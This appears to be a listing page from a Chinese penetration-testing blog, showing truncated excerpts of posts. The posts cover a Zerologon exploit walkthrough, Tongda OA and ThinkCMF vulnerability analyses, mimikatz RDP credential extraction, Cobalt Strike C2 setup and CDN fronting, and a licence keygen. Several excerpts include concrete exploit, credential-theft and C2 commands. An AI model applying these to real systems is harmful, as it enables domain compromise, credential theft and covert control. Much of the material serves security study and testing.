林级域环境下复现CVE-2020-1472
环境 域林环境 根DC:10.100.100.100(server2019) 一级林DC:10.100.100.101(server2016) 二级林DC:10.100.100.102(server2012R2) 跳板机(攻击机):10.100.100.105(WIN10) 简要拓扑 过程 利用过程:将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码 攻击首先安装impacket: git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip install -r requirements.txtpython setup.py install 然后下载利用脚本 git clone https://github.com/dirkjanm/CVE-2020-1472cd CVE-2020-1472 直接拿根域测,执行 python cve-2020-1472-exploit.py AD...
审计通达OA时的一些记录
学习审计通达OA时发现的一些有意思的事 全局变量覆盖审计时发现前辈们提到了这个问题,跟了下存在问题的文件 比如存在变量覆盖的文件是pda\vote\list.php, require_once "pda/auth.php";include_once "inc/conn.php";include_once "inc/utility_all.php";include_once "mobile/api/qyapp.vote.class.php";if ($P == "") { $P = $_COOKIE["PHPSESSID"];}else { $P = $_GET["P"];} 这里包含了inc/conn.php数据库连接文件 继续跟,发现包含了inc/td_config.php <?phpinclude_once...
CS通过CDN上线
学习下CS通过CDN上线 所需 域名*1 CDN*1 VPS*1 部署域名购买后将DNS更改为CDN服务商的DNS服务器,然后等待生效 以CF为例,生效后会给邮箱发一封邮件 然后配置解析域名 CS配置文件 C2.profile ### # @Author : Sp4ce # @Date : 2020-07-15 11:59:42 # @LastEditors : Sp4ce # @LastEditTime : 2020-07-15 15:14:57 # @Description : Challenge Everything.### set sample_name "Etumbot";set sleeptime "2000";set jitter "0";set maxdns "255";set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1;...
域渗透实战
...
通达OA任意文件上传+任意文件包含分析
通达OA官方于2020-03-13发布了安全更新,修复了任意文件上传(2013、2013adv、2015、2016、2017、V11)和文件包含(V11)漏洞,从官网下到源码解密后,简单看了下 直接看主流的2017、V11产品吧,这个系列产品有全版本的变量覆盖问题 V11、2017任意上传以2017为例 补丁文件路径:2020_A1\2017版\ispirit\im\upload.php 左侧为原始代码,右侧为补丁,可以看到直接将鉴权的文件从else里释放了出来,避免了第5行传入P值导致的权限绕过问题 继续往下看任意文件上传的问题 $TYPE = $_POST["TYPE"];//获取TYPE$DEST_UID = $_POST["DEST_UID"];//获取DEST_UID(接收方ID)$dataBack = array();if (($DEST_UID != "") && !td_verify_ids($ids)) { $dataBack =...
还原JS Map文件
做项目时发现一个站点为前后分离的架构,翻了下发现了map文件,采用restore-source-tree还原时报错,记录下解决过程 安装先从git克隆到本地 git clone https://github.com/laysent/restore-source-tree.git 然后进入文件夹 npm install 这里建议挂个代理、VPN,国内很慢 这里在win下会报错 λ npm cinstall npm WARN deprecated [email protected]: � Thanks for using Babel: we recommend using babel-preset-env now: please read...
Apache Log Viewer 5.X 注册机
抽空研究了下ALV的注册机制,写了个注册机 分析ALV的注册方法是unlockCodeToolStripMenuItem_Click方法,当点击Unlock按钮时会触发注册事件并调用Class2类中的smethod_1、smethod_02个方法进行校验,详细流程见如下代码 unlockCodeToolStripMenuItem_Click方法 private void unlockCodeToolStripMenuItem_Click(object sender, EventArgs e) { string text = this.prefs_0.Key; if (!InputForm.smethod_3("Apache Logs Viewer | " + Class96.smethod_264(), Class96.smethod_143(), ref text)) { return; } if (text != null) { text = text.Trim(); } if...
获取远程主机保存的RDP凭据密码
拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。 Windows保存RDP凭据的目录是C:\Users\用户名\AppData\Local\Microsoft\Credentials 可通过命令行获取,执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。 使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID 输出应类似 **BLOB** dwVersion : 00000001...
ThinkCMF缓存getshell
前一阵子接到个项目,目标站是thinkCMF2.X搭建的,试过网上很多方法无法拿下,本地搭了个环境测试了下,最终成功拿下 由于thinkcmf2.x使用了thinkphp3.x作为开发框架,默认情况下启用了报错日志并且开启了模板缓存,导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中,再次包含该日志文件即可在网站根目录下生成一句话木马m.php 日志文件格式为YY_MM_DD.log,如当前日期为2019年12月12日,日志文件为19_12_12.log,完整路径为data/runtime/Logs/Portal/19_12_12.log 测试成功的环境Linux 宝塔[PHP7.2] Windwos PHPstudy...
Cobalt Strike Teamserer的搭建
记录下Cobalt Strike Teamserer的搭建 环境如下 Ubuntu 18.04 Cobalt Strike 3.14 准备一台Ubuntu 18.04的服务器,下载Cobalt Strike完整文件并传到服务器上 安装JDK1.8 apt install openjdk-8-jdk -y 装好后尝试执行./teamserver 10.16.11.55 cSro0t进行验证 启动成功 添加服务vi /etc/systemd/system/cobaltstrike.service [Unit]Description=CS ServiceAfter=network.targetWants=network.target[Service]Type=simplePIDFile=/run/CS.pidWorkingDirectory=/path_to_cobaltstrike_root_directory/ExecStart=/path_to_cobaltstrike_root_directory/teamserver YOUR_SERVER_IP...
